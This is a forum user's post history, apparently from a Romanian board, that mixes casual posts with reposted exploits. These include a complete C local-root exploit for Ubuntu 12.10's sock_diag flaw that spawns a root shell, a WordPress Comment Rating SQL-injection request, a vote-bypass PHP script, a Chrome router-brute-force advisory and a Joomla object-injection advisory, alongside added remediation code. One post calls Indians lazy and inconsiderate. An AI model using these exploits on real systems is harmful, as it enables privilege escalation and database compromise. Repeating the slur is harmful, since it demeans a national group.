Posts: 1577 | Days Won: 10

Everything posted by Gonzalez
-
Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.

```c
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main()
{
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
        printf("Can't create sock diag socket\n");
        return -1;
    }

    /* SOCK_DIAG_BY_FAMILY request with an out-of-range family value */
    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    /* Ubuntu 12.10 x86_64 */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
             MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;

    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

    send(fd, &req, sizeof(req), 0);

    if(!getuid())
        system("/bin/sh");
}
```
-
First of all, do what you like; don't learn programming just because it pays better than x. Be a freelancer with your talent. Programming is fairly hard at first, but it's worth knowing; you never know what opportunity will come your way. I have many programmer friends who now live in America. They got there with the help of the company they worked for. If you don't know how to do anything, start from zero, read tutorials and so on until you learn one thing, and perfect it. When it comes to clients, be confident and deliver the project 100%. Don't forget: do what you like. -Gonzalez
-
1. Code/Racer
Made by the team at Treehouse, Code/Racer is an online racing game that forces you to learn to code quickly to get ahead on the race track. Beyond this racing game, Treehouse boasts more than 650 instructional videos; as you complete courses, earn badges for your accomplishments.

2. MIT OpenCourseWare
MIT has opened all of its course content to web audiences, so anyone, anywhere can learn from one of the top American research institutions. Think about it: an MIT education without the student loans or cut-throat application? Not too shabby.

3. Udacity
Udacity believes today's higher education system is broken. Education is no longer something that happens once in a lifetime, but rather is a lifelong experience. That's why it has ported loads of computer science, math and physics courses online.

4. Mozilla Developer Network
The Mozilla Developer Network is a resource-rich collection of documents about web development, made for anyone, from expert programmers to students just starting out. MDN is a wiki, meaning anyone can edit its pages with corrections and updates.

5. The CodePlayer
On The CodePlayer, watch interactive presentations that explain how people built things from scratch. Once you become a coding pro, you can add your own presentations to teach others what you know.

6. Coursera
Online education giant Coursera brings courses from dozens of top universities online, and lets anyone take them for free. Coursera classes are now available in five languages (English, Spanish, French, Italian and Chinese) and are taught by professors from 62 universities.

7. Codecademy
Unlike some of these other online education platforms, Codecademy focuses solely on teaching coding. You can choose from courses grouped into eight tracks: APIs, Ruby, Python, JavaScript, jQuery, PHP, web fundamentals, or combine languages into projects.

8. Khan Academy
Khan Academy brings millions of students from around the world together to learn all sorts of digital skills, from coding to calculus to computer science theory. This means you can become an expert coder and an expert mathematician in the same place.

9. Learn Python the Hard Way
Learn Python the Hard Way offers free PDFs, though if you want to take the video version of the course, you'll need to fork up $29. What does learning the "Hard Way" mean? The number-one rule is that you can't copy-paste; you must type out each of the lessons in order to teach your hands the language.

10. HTML5 Rocks
HTML5 Rocks is a one-stop guide to learning HTML5, written by tons of contributors who work for Google, Adobe and a bunch of other places. As an HTML5 Rocks student, you'll learn from slides, presentations and videos.
-
I don't know about that; it wouldn't be normal to get away with such an amount, for example $200-300, it wouldn't be right, at least in my opinion. I think PayPal will contact you to pay that amount. It's good never to be in the negative. I told you: if you're in the negative when you receive money in the account, that money will cover the negative amount. My advice is never to have a negative balance in the account. -Gonzalez
-
If you plan to use the account, then when you receive money on it, $30 will disappear from the money you received; unfortunately, I've been in your situation before, and it's really bad. I learned my lesson that Indians aren't allowed on PayPal, they have no access; and I don't do business with them anymore, plus they're lazy and inconsiderate people. -Gonzalez
-
RSSOwl all the way. -Gonzalez
-
Send me a PM so I can see the site, please. I'm not in warez anymore, and I don't have time to help you. I just want to see the site out of curiosity. -Gonzalez
-
Parazitii - In Jur.mp3 -Gonzalez
-
Test, test and test. -Gonzalez
-
FREDDIE GIBBS "Do Wrong pt. 2" OFFICIAL HQ MUSIC VIDEO -Gonzalez
-
# Exploit Title: [Google Chrome Silent HTTP Authentication]
# Date: [2-5-2013]
# Exploit Author: [T355]
# Vendor Homepage: [http://www.google.com/chrome]
# Version: [24.0.1312.57]
# Tested on: [Tested on: Windows 7 & Mac OSX Mountain Lion]
# CVE : [n/a]

VULNERABILITY DETAILS
The latest version of Google Chrome (Tested on Version 24.0.1312.57) fails to properly recognize HTTP Basic Authentication when injected in various HTML tags. As a result of this behavior Chrome will not alert the user when HTTP Basic Authentication is taking place or when credentials are rejected. This behavior is particularly concerning with respect to small office and home routers. Such devices are easily brute forced using this method. Many of these devices have the default password enabled, which brings me to part II of this bug. Silent HTTP Authentication allows the attacker to log into the router and change settings with no alerts or warnings issued by Chrome. The end result allows an attacker to brute force the router login, connect to the router, enable remote administration and of course control all information on the entire network via DNS attacks etc.

REPRODUCTION CASE
I have attached the following files:
sploit.txt - Indicates the buggy code.
jquery.js - Used for real world scenario but not needed for bug.
brute.js - Real world attack scenario for this bug.
index.html - HTML Attack Page
attack.php - Payload file for Linksys Routers.

VERSION
Chrome Version: [24.0.1312.57]
Operating System: [Tested on: Windows 7 & Mac OSX Mountain Lion]

CREDIT
T355

IMPACT
The impact for this bug is enormous. Tens of millions of home routers can easily be completely compromised. Distributed brute force attacks can be performed on any HTTP Authentication portal.

RECOMMENDATIONS
Reference how Firefox and Safari handle the attached code.

PoC: http://www.exploit-db.com/sploits/24486.tar.gz
-
I needed this, thanks. -Gonzalez
-
http://www.publi24.ro/anunturi/animale/caini/bulldog-englez/ http://www.animalutul.ro/anunturi/caini/bulldog-englez/ http://www.canisapremium.ro/caini_bulldog-englez-de-vanzare_52/ -Gonzalez
-
It works fine for me, it loads fast. -Gonzalez
-
You're better off focusing on .com and making an interesting site. I've seen that on .ro there aren't that many sites with traffic. -Gonzalez
-
Parazitii - Am Comis'o Din Nou.mp3 -Gonzalez
-
# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First it takes the IP from the HTTP_X_FORWARDED_FOR header:

```php
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}
```

Later it runs an UPDATE without filtering the input:

```php
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
```

So let's take a look at the DB:

```
mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)
```

Now make an HTTP request with an injection in the HTTP_X_FORWARDED_FOR header:

```http
GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive
```

And the result is:

```
mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)
```

Cheers

=======================================================================================

# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First it takes the IP from the HTTP_X_FORWARDED_FOR header:

```php
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}
```

Later it runs an UPDATE without filtering the input:

```php
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";
```

Now, to bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request. A simple POC is made in PHP:

```php
<?PHP
define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');

for($i=0;$i<1;$i++) lvlup();

function lvlup(){
    global $url;
    $header = "GET ".URL." HTTP/1.1 \r\n";
    $header.= "Host: ".$url['host']."\r\n";
    $header.= "Accept-Encoding: gzip, deflate \r\n";
    $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
    $header.= "Connection: close \r\n\r\n";
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    socket_connect($socket,$url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}
?>
```
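Both advisories above come down to the same two defects in ck-processkarma.php: the client chooses its own "IP" through X-Forwarded-For, and that value is concatenated into SQL. The following is an added example of a hardened replacement for that fragment; it is not the plugin's code or the vendor's fix, and it assumes the WordPress `$wpdb` object plus the plugin's own `$table_name`, `$row`, `$rating`, `$k_id` and `$direction` variables from the surrounding code (the "append the new IP" format is assumed from the table contents shown above).

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// fragment of ck-processkarma.php quoted above. It assumes the WordPress
// $wpdb object and the plugin's own $table_name, $row, $rating, $k_id and
// $direction variables from the surrounding code.

// 1. The client must not pick its own identity. X-Forwarded-For is a
//    free-form header anyone can send; only honour it when the direct peer is
//    a trusted reverse proxy, and validate the result as an IP address.
function ck_client_ip(array $trusted_proxies = array())
{
    $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    if (in_array($ip, $trusted_proxies, true) && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $hops = array_map('trim', explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
        $ip = end($hops);   // the address appended by the trusted proxy itself
    }
    return filter_var($ip, FILTER_VALIDATE_IP) !== false ? $ip : null;
}

// 2. Match whole entries of the stored list; strstr() would also accept
//    "10.1.1.1" because it is a substring of "10.1.1.10".
function ck_already_voted($stored_ips, $ip)
{
    return in_array($ip, array_filter(explode(',', (string) $stored_ips)), true);
}

$ip = ck_client_ip();
if ($ip === null) {
    die('error|Could not determine client address');
}
$duplicated = ck_already_voted($row['ck_ips'], $ip);
$ck_ips = $duplicated ? $row['ck_ips'] : $row['ck_ips'] . ',' . $ip;   // assumed append format

// 3. Column names cannot be bound as parameters, so whitelist $direction;
//    every value goes through $wpdb->prepare() instead of concatenation.
if (!in_array($direction, array('up', 'down'), true)) {
    die('error|Invalid direction');
}
$column = 'ck_rating_' . $direction;
$wpdb->query($wpdb->prepare(
    "UPDATE `$table_name` SET `$column` = %d, ck_ips = %s WHERE ck_comment_id = %d",
    (int) $rating, $ck_ips, (int) $k_id
));
```

With REMOTE_ADDR as the only identity source, the header-rotation PoC from the second advisory no longer yields a fresh "voter" per request, and the prepared statement removes the injection from the first.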
-
-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------

[-] Software Link:
http://www.joomla.org/

[-] Affected Versions:
Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.

[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/highlight/highlight.php:

```php
56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;
```

User input passed through the "highlight" parameter is not properly sanitized before being used in an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability doesn't require authentication, but requires the "System Highlight" plugin to be enabled (such as by default configuration).

[-] Solution:
Upgrade to version 3.0.3 or 2.5.9.

[-] Disclosure Timeline:
[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure

[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1453 to this vulnerability.

[-] Credits:
Vulnerability discovered by Egidio Romano.

[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-03
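The root cause at line 58 is that unserialize() is handed request data, so the request decides which classes get instantiated. As an added example (not Joomla's own code or its 3.0.3 fix), here is a decoder for the "highlight" parameter that only ever yields a flat list of strings; the function name `decode_highlight_terms` and the JSON wire format are assumptions for illustration.

```php
<?php
// Added example, not Joomla's own fix: a decoder for the "highlight"
// parameter that never lets request data instantiate PHP objects. The
// plugin only needs a flat list of search terms, so anything else is
// rejected. $param is the base64 string the plugin reads from the request.
function decode_highlight_terms($param)
{
    if (!is_string($param) || $param === '') {
        return null;
    }
    $raw = base64_decode($param, true);   // strict mode rejects non-base64 input
    if ($raw === false) {
        return null;
    }

    // Preferred wire format: a JSON array of strings, which carries no PHP
    // type information at all.
    $terms = json_decode($raw, true);

    if (!is_array($terms)) {
        // Fallback for legacy serialize()d arrays. On PHP >= 7.0,
        // allowed_classes => false turns every object into
        // __PHP_Incomplete_Class, which the type check below refuses.
        $terms = @unserialize($raw, array('allowed_classes' => false));
        if (!is_array($terms)) {
            return null;
        }
    }

    foreach ($terms as $term) {
        if (!is_string($term)) {
            return null;   // object, nested array or incomplete class: refuse everything
        }
    }
    return array_values($terms);
}

// Constructed inputs: a legitimate term list and a serialized object.
$good = base64_encode(json_encode(array('joomla', 'terms')));
$bad  = base64_encode('O:8:"stdClass":0:{}');
var_dump(decode_highlight_terms($good));
var_dump(decode_highlight_terms($bad));
```

The first call returns the two terms; the second returns NULL, as does a serialized array that smuggles an object among its elements.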
-
Also for the profile you chose; in 2010, I think. -Gonzalez
-
Also at VIA, but I think I had to take 2 exams, one in mathematics and another one I don't remember in what. -Gonzalez
-
I needed mathematics, which I didn't know, and other studies. I had to take an entrance exam. I heard it's free or with a small fee, I think. -Gonzalez
-
Hi, I applied to the university too, but I withdrew at the last minute. I saw some clips on YouTube; there are Romanians there as well. Good luck. -Gonzalez
-
In my opinion, they're too full of themselves. I don't like them. -Gonzalez